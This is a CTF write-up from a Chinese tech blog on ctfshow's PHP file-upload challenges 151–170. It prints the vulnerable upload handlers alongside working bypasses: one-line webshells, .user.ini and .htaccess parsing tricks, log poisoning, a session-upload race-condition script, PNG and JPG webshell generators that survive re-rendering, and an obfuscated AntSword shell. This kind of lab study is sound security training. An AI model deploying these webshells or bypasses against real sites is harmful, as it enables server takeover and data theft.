[CTFSHOW][WEB]文件上传

最新推荐文章于 2024-05-05 18:30:47 发布
最新推荐文章于 2024-05-05 18:30:47 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: web安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41209264/article/details/120582905
版权

web151

根据提示,前端验证,那我们只需要抓包修改就完事儿了。

先传一个正常的图片。

查看数据包

修改数据包,传一个小马。(数据较多时,可以点击开始处,按住shift键,滑动到末尾点击)

右键,选择paste from file可以从文件中粘贴内容。

 

蚁剑连接

找到flag

web152

和上题的步骤一样可以成功上传文件

看一下后端是如何校验的。

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-24 21:20:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
            $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
echo json_encode($ret);

只是检查文件类型为image/png即可。

 web153

利用.user.ini文件进行上传绕过

参考​​​​​​https://segmentfault.com/a/1190000011552335

自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。

 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。 

PHP: php.ini 配置选项列表 - Manual

从列表中找到可以利用的配置选项。

auto_append_file

auto_prepend_file

即只要目录下存在一个php文件,即可添加其它类型文件来以php形式解析。

这里upload目录下刚好有一个index.php

 蚁剑连接

 看一下后端的上传限制

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-24 21:46:57
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
echo json_encode($ret);

 web154

和上题一样,upload下有index.php文件,那应该也是.user.ini绕过文件上传限制。

 发现对文件内容进行了检测。

抄一张图片

修改一句话木马后绕过

 查看后端上传限制,发现只要内容中包含php关键字就会被禁止上传。 

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-26 15:30:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
                if(strrpos($content, "php")==FALSE){
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                }else{
                    $ret = array("code"=>3,"msg"=>"文件内容不合规");
                }
                
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
echo json_encode($ret);

web155

同上

查看后端上传限制代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-26 15:49:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
                if(stripos($content, "php")===FALSE){
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                }else{
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }
                
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
echo json_encode($ret);

strrpos()https://www.php.net/manual/zh/function.strrposhttps://www.php.net/manual/zh/function.strrpos函数换成了

stripos()https://www.php.net/manual/zh/function.striposhttps://www.php.net/manual/zh/function.stripos

web156

后端对[进行了过滤。

使用{绕过。

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-26 15:49:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if($ext_suffix!='php'){
                $content = file_get_contents($_FILES["file"]["tmp_name"]);
                if(stripos($content, "php")===FALSE && stripos($content,"[")===FALSE){
                    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$_FILES["file"]["name"]);
                    $ret = array("code"=>0,"msg"=>"upload/".$_FILES["file"]["name"]);
                }else{
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }
                
            }else{
                $ret = array("code"=>2,"msg"=>"文件类型不合规");
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
echo json_encode($ret);

web157

过滤了更多字符

preg_match('/php|\{|\[|\;/i', $str)

直接上传以下代码执行命令

<?=`cat ../flag*`?>

web158

 同上,使用命令执行

过滤了更多字符

preg_match('/php|\{|\[|\;|log/i', $str)

web159

 同上,使用命令执行

过滤了更多字符

preg_match('/php|\{|\[|\;|log|\(/i', $str)

web160

 继续增加过滤字符

preg_match('/php|\{|\[|\;|log|\(| |\`/i', $str)

 使用日志包含

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

user-agent处输入一句话木马 

 web161

 同样使用上题的方法

不过要使用图片头GIF通过检查

后端使用

getimagesize()https://www.php.net/manual/zh/function.getimagesizehttps://www.php.net/manual/zh/function.getimagesize

进行检查

参考imagemagick邂逅getimagesize的那点事儿 | 离别歌

web162

增加了过滤字符.

使用session文件包含

参考https://segmentfault.com/a/1190000040149634

使用条件竞争来执行命令

import requests
import threading
session=requests.session()
sess='test'
url1="http://b12d2533-8270-47c4-bade-1f3fb59ea8c9.challenge.ctf.show:8080/"
url2="http://b12d2533-8270-47c4-bade-1f3fb59ea8c9.challenge.ctf.show:8080/upload/index.php"
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php system("tac ../f*");?>'
}
file={
	'file':'jfjafjejfj'
}
cookies={
	'PHPSESSID': sess
}

def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.get(url2)
		if 'flag' in r.text:
			print("[+]*****susccess*****")
			print(r.text)
		else:
			print("[-]*****retry*****")
			
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

 web163

和上题一样,不过上传的文件会立即被删除,但.user.ini文件不会被删除。

直接使用

GIF
auto_prepend_file="/tmp/sess_test"

使用上题脚本,得到flag。

 web164

现在终于可以上传正常图片了。==

增加了一个查看图片功能。

本题考查二次渲染,参考https://xz.aliyun.com/t/2657

在图片末尾添加<?php phpinfo();?>,查看下载图片,发现php代码被去除

需要将shell写入png中。

参考Encoding Web Shells in PNG IDAT chunks | Application SecurityMake web shells magically appear inside a PNG IDAT chunk when you re-size an image.https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

copy一份脚本。

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   echo $color;
   echo '\n';
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

利用文件包含执行命令

 查看后端处理代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-27 17:14:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
	$ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
    	$ret = array("code"=>1,"msg"=>"æ件è¶è¿1024KB");
    }else{
    	if($_FILES['file']['type'] == 'image/png'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if(in_array($ext_suffix, array("png"))){
                $png = imagecreatefrompng($_FILES["file"]["tmp_name"]);
                if($png==FALSE){
                    $ret = array("code"=>2,"msg"=>"æ件类åä¸åè§");
                }else{
                    $dst = 'upload/'.md5($_FILES["file"]["name"]).".png";
                    imagepng($png,$dst);
                    $ret = array("code"=>0,"msg"=>md5($_FILES["file"]["name"]).".png");
                }
            }else{
                $ret = array("code"=>3,"msg"=>"åªå许ä¸ä¼ pngæ ¼å¼å¾ç");
            }
            
    		
    	}else{
    		$ret = array("code"=>2,"msg"=>"æ件类åä¸åè§");
    	}
    	
    }

}


echo json_encode($ret);

主要使用 imagecreatefrompng和imagepng函数将上传图片重写了一遍。

web165

限制上传jpg

上脚本

<?php
    /*

    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
    It is necessary that the size and quality of the initial image are the same as those of the processed image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:
    jpg_payload.php <jpg_name.jpg>

    In case of successful injection you will get a specially crafted image, which should be uploaded again.

    Since the most straightforward injection method is used, the following problems can occur:
    1) After the second processing the injected data may become partially corrupted.
    2) The jpg_payload.php script outputs "Something's wrong".
    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

    Sergey Bobrov @Black2Fan.

    See also:
    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

    */

    $miniPayload = '<?=eval($_POST[1]);?>';


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

根据脚本说明,先上传一张jpg图片。

 

下载经过渲染的图片

 

使用脚本生成图片马

 

  图片变成这样了,😂不过不影响上传。

同上题利用文件包含。

查看后端上传限制代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-27 17:14:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/jpeg'){
            $arr = pathinfo($filename);
            $ext_suffix = $arr['extension'];
            if(in_array($ext_suffix, array("jpg"))){
                $jpg = imagecreatefromjpeg($_FILES["file"]["tmp_name"]);
                if($jpg==FALSE){
                    $ret = array("code"=>2,"msg"=>"文件类型不合规");
                }else{
                    $dst = 'upload/'.md5($_FILES["file"]["name"]).".jpg";
                    imagejpeg($jpg,$dst);
                    $ret = array("code"=>0,"msg"=>md5($_FILES["file"]["name"]).".jpg");
                }
            }else{
                $ret = array("code"=>3,"msg"=>"只允许上传jpg格式图片");
            }
            
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
echo json_encode($ret);

web166

限制上传zip格式文件

正常的zip格式都上传不了,🤔

还必须把Content-Type: application/zip改成Content-Type: application/x-zip-compressed

但是没有检查格式及内容。

 

 

 

 web167

web服务器从nginx换成了apache

利用.htcaccess文件。

将其他类型文件解析成php

格式一:

AddType application/x-httpd-php jpg

格式二: 

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

 

  web168

 基础免杀

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-30 00:11:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $str = file_get_contents($_FILES["file"]["tmp_name"]);
            if(check($str)===0){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>$_FILES["file"]["name"]);
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
function check($str){
    return preg_match('/eval|assert|assert|_POST|_GET|_COOKIE|system|shell_exec|include|require/i', $str);
}
echo json_encode($ret);

使用蚁剑自带的生成shell

<?php // 使用时请删除此行, 连接密码: PdYvwthi ?>
<?php $jqGS=create_function(chr(0x193-0x16f).chr(0657-0474).chr(102564/924).base64_decode('bQ==').chr(402-301),str_rot13('r').chr(0x286-0x210).chr(0x3c4-0x363).base64_decode('bA==').base64_decode('KA==').chr(0x2a1-0x27d).chr(0264271/01443).chr(01504-01325).chr(0xb341/0x1a5).str_rot13('r').chr(0x268-0x23f).base64_decode('Ow=='));$jqGS(base64_decode('NzgyN'.'DI2O0'.'BldkF'.'sKCRf'.''.base64_decode('VQ==').str_rot13('R').base64_decode('OQ==').str_rot13('G').chr(0670-0542).''.''.chr(0x1de-0x198).base64_decode('dA==').base64_decode('UQ==').str_rot13('M').str_rot13('S').''.'l2d3R'.'oaV0p'.'OzIzN'.'DcyNz'.'g7'.''));?>

web169

< > php ?都过滤了

这还是免杀吗,。。。。😓

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-30 00:11:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $str = file_get_contents($_FILES["file"]["tmp_name"]);
            if(check($str)===0){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>$_FILES["file"]["name"]);
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
function check($str){
    return preg_match('/eval|include|require|assert|assert|_POST|_GET|_COOKIE|system|shell_exec|php|\\$|\?|\<|\>/i', $str);
}
echo json_encode($ret);

 利用.user.ini包含日志文件。

web170

这过滤简直丧心病狂😠

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-24 19:34:52
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-30 00:11:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
    $ret = array("code"=>2,"msg"=>$_FILES["file"]["error"]);
}
else
{
    $filename = $_FILES["file"]["name"];
    $filesize = ($_FILES["file"]["size"] / 1024);
    if($filesize>1024){
        $ret = array("code"=>1,"msg"=>"文件超过1024KB");
    }else{
        if($_FILES['file']['type'] == 'image/png'){
            $str = file_get_contents($_FILES["file"]["tmp_name"]);
            if(check($str)===0){
                move_uploaded_file($_FILES["file"]["tmp_name"], './upload/'.$_FILES["file"]["name"]);
                $ret = array("code"=>0,"msg"=>$_FILES["file"]["name"]);
            }
            
        }else{
            $ret = array("code"=>2,"msg"=>"文件类型不合规");
        }
        
    }
}
function check($str){
    return preg_match('/eval|assert|assert|_POST|_GET|_COOKIE|system|shell_exec|php|\\$|\?|\<|\>|\(|\)|\{|\[|\}|]|\,|\%|\`|\~|\+/i', $str);
}
echo json_encode($ret);

 还是采用上题方法。

fallingskies22
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
验证绕过全解析
weixin_33941350的博客
04-19 670
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
ctf-web入门-文件
whisper921的博客
05-28 4013
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上png图片 修改为php 写一个php文件一句话木马 可以发现已经成功上 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
2024年最全CTFshow web入门——文件_ctfshow文件,给大家安排上
最新发布
2401_84520377的博客
05-05 919
一个图片木马,发现上不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上,bp抓包。
php 写入文件 ctf,php代码审计前奏之ctfshow文件
weixin_33213367的博客
03-10 836
想搞好代码审计,必须要搞懂其中一些危险函数危险应用,以及过滤不足,故以 CTF 来练习。web151~前端验证直接抓包修改后缀。web152~前端+MIME直接抓包修改后缀。web153~.user.ini使用条件:(1)服务器脚本语言为PHP 服务器使用CGI/FastCGI模式(2)上目录下要有可执行的php文件使用方式:上一张图片马上 .user.iniauto_prepend_fil...
CTFshow——文件
D.MIND 的博客
02-23 1293
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上PNG文件,上一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
CTFshow web入门——文件
热门推荐
小元砸的博客
03-14 1万+
Web 151
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
CTFshow | 文件
m0_60651303的博客
08-04 758
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上文件漏洞是指用户上了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
CTFshow-文件
qq_61376069的博客
01-22 509
CTFshow入门——文件
【CTF】文件(知识点+例题)(1)
qq_53099119的博客
03-23 5065
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上一个名为1.png的木马文件,植入后门,将其上后,该文件文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTFshow Web入门 文件
m0_62905261的博客
10-05 787
CTFshow Web入门 文件
ctfshow--web入门--文件
weixin_74985952的博客
06-29 488
前端校验,采用修改前端代码或禁用JS等content-type校验,修改数据包中content-type值上配置文件,修改配置进行上内容检测,通过二分法测试出检测内容,使用各种姿势进行绕过文件头校验,在文件中添加符合上规则的文件头配合文件包含,使用包含日志和包含session文件二次渲染使用脚本构建图片马配合文件包含进行上
CTFShow-WEB入门篇文件详细Wp(151-170)
Aluxian_的博客
07-16 2055
【代码】CTFShow-WEB入门篇文件详细Wp(115-170)
CTFshow web入门 web150-web170 文件
qq_56815564的博客
07-04 591
俗话说的好,逆向手的尽头是全栈,于是我又回来学web了,前面可能还看得懂一点,后面因为一心只想着做题目去了就没讲太细了,不过如果前面理解的话后面肯定也是知道的,所以加油吧。
CTFSHOW文件151-170
qq_68233961的博客
02-26 713
CTFshow文件
ctfshow web入门文件
09-29
文件是CTF比赛中的一个常见挑战之一。其中一种方法是通过上包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上图片时,可以同时上一个名为.user.ini的文件,并在其中设置auto_append_file参数来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值